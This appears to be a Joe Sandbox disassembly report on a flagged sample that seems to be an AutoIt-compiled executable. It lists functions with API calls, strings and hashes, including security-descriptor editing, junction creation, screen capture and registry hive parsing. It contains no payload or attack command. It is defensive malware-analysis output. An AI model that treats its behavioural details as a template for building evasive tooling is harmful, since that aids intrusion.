
Part of subcall function 00E27D2C: _memmove.LIBCMT ref: 00E27D66

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00EAA5BC
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00EAA5DE
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EAA5F1
DestroyWindow.USER32(00000000), ref: 00EAA613
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E20000,00000000), ref: 00EAA64A
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EAA663
GetDesktopWindow.USER32 ref: 00EAA67C
GetWindowRect.USER32(00000000), ref: 00EAA683
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00EAA69B
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00EAA6B3

Part of subcall function 00E225DB: GetWindowLongW.USER32(?,000000EB), ref: 00E225EC

Strings

0, xrefs: 00EAA4DE
tooltips_class32, xrefs: 00EAA5B5, 00EAA643

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 566951da2c835c63e87936b932a71a8330e42bc463cf87d4f90f51fa6ce9957a
Instruction ID: cdd0628d77974a983b80eaa063891d5997a9288acb16e753b0728200d2aaca3e
Opcode Fuzzy Hash: 566951da2c835c63e87936b932a71a8330e42bc463cf87d4f90f51fa6ce9957a
Instruction Fuzzy Hash: 68716571140345AFD724CF28C849F6A7BE6EB9E304F085929F985AB2A0D770E906CF56

Function 00EA4619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00EA46AB
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EA46F6

Strings

UNCHECK, xrefs: 00EA48D2
GETTOTALCOUNT, xrefs: 00EA46DD
EXISTS, xrefs: 00EA475F
COLLAPSE, xrefs: 00EA473C
CHECK, xrefs: 00EA4716
EXPAND, xrefs: 00EA47A8
GETITEMCOUNT, xrefs: 00EA47D8
ISCHECKED, xrefs: 00EA4879
GETSELECTED, xrefs: 00EA4806
SELECT, xrefs: 00EA48A7
GETTEXT, xrefs: 00EA4849

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: c2deffc1c4faf230d0a5f0d433966011773e26592d30916b5f69a5457f751eaa
Instruction ID: 29484bb8024623a331e5632aedd2989bfd9f4aea53cf4439319786afaaf4748c
Opcode Fuzzy Hash: c2deffc1c4faf230d0a5f0d433966011773e26592d30916b5f69a5457f751eaa
Instruction Fuzzy Hash: 2F917BB46043118BCB14EF10D451A6AB7E1AFC9314F05A86DB8967B3A3DB71FD4ACB81

Function 00EABAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00EABB6E
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00EA9431), ref: 00EABBCA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EABC03
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00EABC46
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EABC7D
FreeLibrary.KERNEL32(?), ref: 00EABC89
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EABC99
DestroyIcon.USER32(?,?,?,?,?,00EA9431), ref: 00EABCA8
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00EABCC5
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00EABCD1

Part of subcall function 00E4313D: __wcsicmp_l.LIBCMT ref: 00E431C6

Strings

.exe, xrefs: 00EABB04
.icl, xrefs: 00EABAE4
.dll, xrefs: 00EABB27

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: b10e9c94bd906e6253064f279842b7285db1aa5905bc0b6d951aaf3770ed5c42
Instruction ID: 2325a66a769b4eda37fede6bf6ce0bda738d6ea40e7231ba2f31677d1c7ffbe9
Opcode Fuzzy Hash: b10e9c94bd906e6253064f279842b7285db1aa5905bc0b6d951aaf3770ed5c42
Instruction Fuzzy Hash: 9961FF71500218BEEB14DF60DC41FBAB7A8EB0D720F10521AF915EA1C2DB70A994CBA0

Function 00E8A0B5 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00EAFB78), ref: 00E8A0FC

Part of subcall function 00E27F41: _memmove.LIBCMT ref: 00E27F82

LoadStringW.USER32(?,?,00000FFF,?), ref: 00E8A11E
__swprintf.LIBCMT ref: 00E8A177
__swprintf.LIBCMT ref: 00E8A190
_wprintf.LIBCMT ref: 00E8A246
_wprintf.LIBCMT ref: 00E8A264

Strings

Error: , xrefs: 00E8A20E
"%s" (%d) : ==> %s:%s%s, xrefs: 00E8A241
%, xrefs: 00E8A0C9
Line %d (File "%s"):, xrefs: 00E8A171, 00E8A18A
"%s" (%d) : ==> %s:, xrefs: 00E8A25F
^ ERROR, xrefs: 00E8A1E8

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%
API String ID: 311963372-1048875529
Opcode ID: ba171cb9fcd75acb2197744107fd3abf7b43e51fa2c7bb3afb27b587ef68f3fe
Instruction ID: 03b478bb2032e4aa5c55a7dc75ad79d857bc4322beb37c4f8766722be526fb5a
Opcode Fuzzy Hash: ba171cb9fcd75acb2197744107fd3abf7b43e51fa2c7bb3afb27b587ef68f3fe
Instruction Fuzzy Hash: AC518371900219AADF15FBE0DD86EEEB7B8EF18300F141166F509721A1EB316F58DB61

Function 00E8A5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00E29997: __itow.LIBCMT ref: 00E299C2
Part of subcall function 00E29997: __swprintf.LIBCMT ref: 00E29A0C

CharLowerBuffW.USER32(?,?), ref: 00E8A636
GetDriveTypeW.KERNEL32 ref: 00E8A683
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E8A6CB
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E8A702
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E8A730

Part of subcall function 00E27D2C: _memmove.LIBCMT ref: 00E27D66

Strings

closed, xrefs: 00E8A64A, 00E8A653
open , xrefs: 00E8A692
close, xrefs: 00E8A63C
wait, xrefs: 00E8A6ED
open, xrefs: 00E8A65D
close cd wait, xrefs: 00E8A71B
type cdaudio alias cd wait, xrefs: 00E8A6AE
set cd door , xrefs: 00E8A6D1

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 75547f3130a743c4fec2c56acf87584a99b74207ae64068a5cccc5ae13e5b661
Instruction ID: 5ff79066140d1792ece4b56808cc0239e3476bebf4424a8dd9dc98fca647a63c
Opcode Fuzzy Hash: 75547f3130a743c4fec2c56acf87584a99b74207ae64068a5cccc5ae13e5b661
Instruction Fuzzy Hash: DD513B711043149FD700EF20D98196AB7F4FF88718F08696EF89A67261DB31EE0ACB52

Function 00E8A45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E8A47A
__swprintf.LIBCMT ref: 00E8A49C
CreateDirectoryW.KERNEL32(?,00000000), ref: 00E8A4D9
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00E8A4FE
_memset.LIBCMT ref: 00E8A51D
_wcsncpy.LIBCMT ref: 00E8A559
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00E8A58E
CloseHandle.KERNEL32(00000000), ref: 00E8A599
RemoveDirectoryW.KERNEL32(?), ref: 00E8A5A2
CloseHandle.KERNEL32(00000000), ref: 00E8A5AC

Strings

\, xrefs: 00E8A4B2
:, xrefs: 00E8A4BD
\??\%s, xrefs: 00E8A496

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: e20b3e04fd8304bbd1a9eb21f808fad53f6000e2079904039f26fa8a7c7147c5
Instruction ID: 9a21227ae6925ec08406891aeea6ccbeb60082352f094939a8691762bd0b34ea
Opcode Fuzzy Hash: e20b3e04fd8304bbd1a9eb21f808fad53f6000e2079904039f26fa8a7c7147c5
Instruction Fuzzy Hash: 4231A275500109ABDB219FA1DC48FEB73BCEF89705F1451B6F90CE2160E77096498B25

Function 00EAC49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E22612: GetWindowLongW.USER32(?,000000EB), ref: 00E22623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00EAC4EC
GetFocus.USER32 ref: 00EAC4FC
GetDlgCtrlID.USER32(00000000), ref: 00EAC507
_memset.LIBCMT ref: 00EAC632
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00EAC65D
GetMenuItemCount.USER32(?), ref: 00EAC67D
GetMenuItemID.USER32(?,00000000), ref: 00EAC690
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00EAC6C4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00EAC70C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EAC744
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00EAC779

Strings

0, xrefs: 00EAC62A

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 22cf6d70c6b9a05b26f464dc2968802ebd6926c01e9f682cde4358fb10067ba8
Instruction ID: 7b5718b7a40e9ce09d662a9f97c3d4b430191e56d837c825c5191fb1c799f16d
Opcode Fuzzy Hash: 22cf6d70c6b9a05b26f464dc2968802ebd6926c01e9f682cde4358fb10067ba8
Instruction Fuzzy Hash: 6281AF705083059FD720CF25D884A6BBBE4FF8E358F20252EF995AB291D770E945CB92

Function 00E783F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E7874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E78766
Part of subcall function 00E7874A: GetLastError.KERNEL32(?,00E7822A,?,?,?), ref: 00E78770
Part of subcall function 00E7874A: GetProcessHeap.KERNEL32(00000008,?,?,00E7822A,?,?,?), ref: 00E7877F
Part of subcall function 00E7874A: HeapAlloc.KERNEL32(00000000,?,00E7822A,?,?,?), ref: 00E78786
Part of subcall function 00E7874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E7879D

Part of subcall function 00E787E7: GetProcessHeap.KERNEL32(00000008,00E78240,00000000,00000000,?,00E78240,?), ref: 00E787F3
Part of subcall function 00E787E7: HeapAlloc.KERNEL32(00000000,?,00E78240,?), ref: 00E787FA
Part of subcall function 00E787E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E78240,?), ref: 00E7880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E78458
_memset.LIBCMT ref: 00E7846D
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E7848C
GetLengthSid.ADVAPI32(?), ref: 00E7849D
GetAce.ADVAPI32(?,00000000,?), ref: 00E784DA
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E784F6
GetLengthSid.ADVAPI32(?), ref: 00E78513
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E78522
HeapAlloc.KERNEL32(00000000), ref: 00E78529
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E7854A
CopySid.ADVAPI32(00000000), ref: 00E78551
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E78582
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E785A8
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E785BC

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 6044f325b2ea1898f67629dad73d7ca54a1466598431018ef0d42a8ab5952e36
Instruction ID: e4b5f7b093e48e5c7d4ce06408d56902024a52b63b3ddb323020d1ce668f81d1
Opcode Fuzzy Hash: 6044f325b2ea1898f67629dad73d7ca54a1466598431018ef0d42a8ab5952e36
Instruction Fuzzy Hash: A7615D7194020AAFDF10DF91DD88AAEBBB9FF15304F148169E819B6291DB30AA05CF60

Function 00E9762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00E976A2
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00E976AE
CreateCompatibleDC.GDI32(?), ref: 00E976BA
SelectObject.GDI32(00000000,?), ref: 00E976C7
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00E9771B
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00E97757
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00E9777B
SelectObject.GDI32(00000006,?), ref: 00E97783
DeleteObject.GDI32(?), ref: 00E9778C
DeleteDC.GDI32(00000006), ref: 00E97793
ReleaseDC.USER32(00000000,?), ref: 00E9779E

Strings

(, xrefs: 00E97723

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 08babd80885817804376616f1cb0d9abe6cd7ab87c4ba592703780d7f6a33210
Instruction ID: 6adbac3617e25e1522eaadb47735c3efb9f71967d1d7369301ac781985df1bc0
Opcode Fuzzy Hash: 08babd80885817804376616f1cb0d9abe6cd7ab87c4ba592703780d7f6a33210
Instruction Fuzzy Hash: C0515A75904309EFCB15CFA9CC85EAEBBB9EF49310F14842EF989A7211D731A844CB60

Function 00E26BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00E40B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00E26C6C,?,00008000), ref: 00E40BB7

Part of subcall function 00E248AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E248A1,?,?,00E237C0,?), ref: 00E248CE

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E26D0D
SetCurrentDirectoryW.KERNEL32(?), ref: 00E26E5A

Part of subcall function 00E259CD: _wcscpy.LIBCMT ref: 00E25A05

Part of subcall function 00E4387D: _iswctype.LIBCMT ref: 00E43885

Strings

AU3!, xrefs: 00E26CC1
Unterminated string, xrefs: 00E5EC0D
>>>AUTOIT SCRIPT<<<, xrefs: 00E5E8BF
Error opening the file, xrefs: 00E5E866, 00E5E8E1
Bad directive syntax error, xrefs: 00E5EBC6
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00E5E84A
EA06, xrefs: 00E5E87B

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: fd76d1f5cb958e3db8526460febe49dccd2df50e2b3815c17d2f1be8efa12528
Instruction ID: 57e998391ab5563c2bd2b21d76175b80af399878cf8c8faff1c326c6ad6f318c
Opcode Fuzzy Hash: fd76d1f5cb958e3db8526460febe49dccd2df50e2b3815c17d2f1be8efa12528
Instruction Fuzzy Hash: 9D02AF711083519FC724EF24D9819AFBBE5BF88314F04691DF8DAA72A1DB30DA49CB42

Function 00E245DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E245F9
GetMenuItemCount.USER32(00EE6890), ref: 00E5D7CD
GetMenuItemCount.USER32(00EE6890), ref: 00E5D87D
GetCursorPos.USER32(?), ref: 00E5D8C1
SetForegroundWindow.USER32(00000000), ref: 00E5D8CA
TrackPopupMenuEx.USER32(00EE6890,00000000,?,00000000,00000000,00000000), ref: 00E5D8DD
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E5D8E9

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: 383f9fbffca968217d0202cd4b963ab10efaeffd6badd613496d2e0846a68a82
Instruction ID: e96f7fadc8c6638daa9d5a1d8d3a38c47d0fd7a3154b8a9b6f29829a1e81bc09
Opcode Fuzzy Hash: 383f9fbffca968217d0202cd4b963ab10efaeffd6badd613496d2e0846a68a82
Instruction Fuzzy Hash: 9F71F370605215BEEB309F55DC85FAABFA4FF09369F201216F919761E0C7B16C14DB90

Function 00E98BC0 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00E98BEC
CoInitialize.OLE32(00000000), ref: 00E98C19
CoUninitialize.OLE32 ref: 00E98C23
GetRunningObjectTable.OLE32(00000000,?), ref: 00E98D23
SetErrorMode.KERNEL32(00000001,00000029), ref: 00E98E50
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00EB2C0C), ref: 00E98E84
CoGetObject.OLE32(?,00000000,00EB2C0C,?), ref: 00E98EA7
SetErrorMode.KERNEL32(00000000), ref: 00E98EBA
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00E98F3A
VariantClear.OLEAUT32(?), ref: 00E98F4A

Strings

,,, xrefs: 00E98BD6

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID: ,,
API String ID: 2395222682-1556401989
Opcode ID: 43f071f24ee59fbe8f84c4513ba12056e23aec14780a0bd3091855172827bdb3
Instruction ID: 459d3c919ca474303e90bb072bf0fea1e70cd491d07ff0da1a7b5448bb468253
Opcode Fuzzy Hash: 43f071f24ee59fbe8f84c4513ba12056e23aec14780a0bd3091855172827bdb3
Instruction Fuzzy Hash: 7AC12571208305AFDB04DF64C98496BB7E9FF8A348F00596DF589AB261DB31ED05CB52

Function 00EA10A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EA0038,?,?), ref: 00EA10BC

Strings

HKEY_CURRENT_CONFIG, xrefs: 00EA1179
HKEY_CURRENT_USER, xrefs: 00EA119B
HKCU, xrefs: 00EA11AC
HKU, xrefs: 00EA11CE
HKLM, xrefs: 00EA113A
HKEY_LOCAL_MACHINE, xrefs: 00EA1125
HKEY_USERS, xrefs: 00EA11BD
HKCR, xrefs: 00EA1164
HKCC, xrefs: 00EA118A
HKEY_CLASSES_ROOT, xrefs: 00EA114F

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

